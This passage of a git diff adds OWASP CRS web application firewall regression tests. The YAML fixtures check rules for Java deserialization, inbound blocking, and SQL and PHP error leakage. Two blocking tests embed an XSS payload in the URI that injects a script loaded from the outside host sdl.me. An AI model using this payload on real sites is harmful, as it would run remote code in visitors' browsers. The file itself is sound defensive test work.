"POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-330 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml new file mode 100644 index 0000000000..0250715153 --- /dev/null +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -0,0 +1,91 @@ +--- +meta: + author: "studersi" + enabled: true + name: "949110.yaml" + description: | + Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 949110-1 + desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "949110" + - test_title: 949110-2 + desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: / + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.cnn.com + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + no_log_contains: id "949110" + - test_title: 949110-3 + desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"949110\"" + - test_title: 949110-4 + desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"949110\"" + - test_title: 949110-5 + desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml new file mode 100644 index 0000000000..be9efacdaf --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951110.yaml" + description: "Regression tests for rule 951110" +tests: + - test_title: 951110-1 + desc: "Matching Microsoft Access SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression" + output: + log_contains: "id \"951110\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml new file mode 100644 index 0000000000..7220096837 --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951120.yaml" + description: "Regression tests for rule 951120" +tests: + - test_title: 951120-1 + desc: "Matching Oracle SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended" + output: + log_contains: "id \"951120\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml new file mode 100644 index 0000000000..2c8e7a707e --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951130.yaml" + description: "Regression tests for rule 951130" +tests: + - test_title: 951130-1 + desc: "Matching DB2 SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE" + output: + log_contains: "id \"951130\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml new file mode 100644 index 0000000000..64750bbd3c --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951140.yaml" + description: "Regression tests for rule 951140" +tests: + - test_title: 951140-1 + desc: "Matching EMC SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: "A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in"' + output: + log_contains: "id \"951140\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml new file mode 100644 index 0000000000..139c38176a --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951150.yaml" + description: "Regression tests for rule 951150" +tests: + - test_title: 951150-1 + desc: "Matching firebird SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error" + output: + log_contains: "id \"951150\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml new file mode 100644 index 0000000000..d57698b81f --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951160.yaml" + description: "Regression tests for rule 951160" +tests: + - test_title: 951160-1 + desc: "Matching Frontbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback." + output: + log_contains: "id \"951160\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml new file mode 100644 index 0000000000..effc58642c --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951170.yaml" + description: "Regression tests for rule 951170" +tests: + - test_title: 951170-1 + desc: "Matching hsqldb SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)" + output: + log_contains: "id \"951170\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml new file mode 100644 index 0000000000..8a0dbec48f --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951180.yaml" + description: "Regression tests for rule 951180" +tests: + - test_title: 951180-1 + desc: "Matching informix SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread "main" java.sql.SQLException: An illegal character has been found in the statement.' + output: + log_contains: "id \"951180\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml new file mode 100644 index 0000000000..4ca909e711 --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951190.yaml" + description: "Regression tests for rule 951190" +tests: + - test_title: 951190-1 + desc: "Matching ingres SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)" + output: + log_contains: "id \"951190\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml new file mode 100644 index 0000000000..b7212c5ab7 --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951200.yaml" + description: "Regression tests for rule 951200" +tests: + - test_title: 951200-1 + desc: "Matching interbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']." + output: + log_contains: "id \"951200\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml new file mode 100644 index 0000000000..03824bd58f --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951210.yaml" + description: "Regression tests for rule 951210" +tests: + - test_title: 951210-1 + desc: "Matching maxDB SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length" + output: + log_contains: "id \"951210\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml new file mode 100644 index 0000000000..6dc042ea4d --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -0,0 +1,48 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951220.yaml" + description: "Regression tests for rule 951220" +tests: + - test_title: 951220-1 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375" + output: + log_contains: "id \"951220\"" + + - test_title: 951220-2 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int." + output: + log_contains: "id \"951220\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml new file mode 100644 index 0000000000..f82cc793a8 --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951230.yaml" + description: "Regression tests for rule 951230" +tests: + - test_title: 951230-1 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'." + output: + log_contains: "id \"951230\"" + - test_title: 951230-2 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'" + output: + log_contains: "id \"951230\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml new file mode 100644 index 0000000000..d9e269751e --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951240.yaml" + description: "Regression tests for rule 951240" +tests: + - test_title: 951240-1 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56" + output: + log_contains: "id \"951240\"" + - test_title: 951240-2 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer" + output: + log_contains: "id \"951240\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml new file mode 100644 index 0000000000..e01973cc6b --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951250.yaml" + description: "Regression tests for rule 951250" +tests: + - test_title: 951250-1 + desc: "Matching SQLite SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94" + output: + log_contains: "id \"951250\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml new file mode 100644 index 0000000000..33c3266ce2 --- /dev/null +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951260.yaml" + description: "Regression tests for rule 951260" +tests: + - test_title: 951260-1 + desc: "Matching Sybase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10" + output: + log_contains: "id \"951260\"" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml new file mode 100644 index 0000000000..d01496d554 --- /dev/null +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953100.yaml" + description: "Tests for rule 953100" +tests: + - test_title: 953100-1 + desc: "'File size is' leads to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + no_log_contains: id "953100" + - test_title: 953100-2 + desc: "'Invalid date' Wordpress FP, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + no_log_contains: id "953100" + - test_title: 953100-3 + desc: "'The function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "please review the function" + output: + no_log_contains: id "953100" + - test_title: 953100-4 + desc: "'Static function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + no_log_contains: id "953100" + - test_title: 953100-5 + desc: "'cannot be empty is too common for PL-1 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Field cannot be empty." + output: + no_log_contains: id "953100" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml new file mode 100644 index 0000000000..20f3789d3e --- /dev/null +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953101.yaml" + description: "Tests for rule 953101" +tests: + - test_title: 953101-1 + desc: "'File size is' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + log_contains: id "953101" + - test_title: 953101-2 + desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + log_contains: id "953101" + - test_title: 953101-3 + desc: "'The function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Please review the function" + output: + log_contains: id "953101" + - test_title: 953101-4 + desc: "'Static function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 